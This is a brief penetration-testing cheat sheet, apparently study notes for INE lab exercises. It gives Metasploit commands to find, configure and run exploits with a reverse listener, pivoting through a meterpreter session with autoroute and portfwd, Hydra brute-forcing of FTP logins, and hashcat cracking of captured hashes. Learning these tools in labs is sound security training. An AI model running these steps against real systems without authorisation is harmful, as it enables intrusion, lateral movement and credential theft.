# Most used tools

### Identify and modify exploits

Tools: msfconsole, searchsploit

Usage:

1. Search an exploit

```bash
msfconsole -q
search proftpd
```

2. Select an exploit:

```bash
use exploit/...
```

3. Modify the exploit:

```bash
show options
set RHOSTS demo.ine.local
set LHOST 192.0.0.1
set LPORT 6789
```

4. Run the exploit:

```bash
run
```

***

### Demonstrate pivoting by adding a route and port forwarding

Tools: autoroute, portfwd

Context: To execute it, first we must have a meterpreter shell

Usage:

1. Identify our IP in the subnet

```bash
ipconfig
```

2. Run autoroute. If our IP is 10.0.19.197...

```bash
run autoroute -s 10.0.19.0/20
```

3. Scan for new hosts

```bash
background
use auxiliary/scanner/portscan/tcp
set RHOSTS demo2.ine.local
set PORTS 1-100
exploit
```

4. Pivot by port forwarding

```bash
sessions -i
portfwd add -l 1234 -p 80 -r <demo2.ine.local IP>
portfwd list
```

5. In our local execute:

```bash
nmap -sCV -sS -p 1234 localhost
```

***

### Conduct brute-force password attacks

Tools: Hydra, msfconsole

Usage:

{% code overflow="wrap" %}

```bash
hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local ftp
```

{% endcode %}

***

### Conduct hash cracking

Tools: hashcat, john

Usage:

```bash
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
```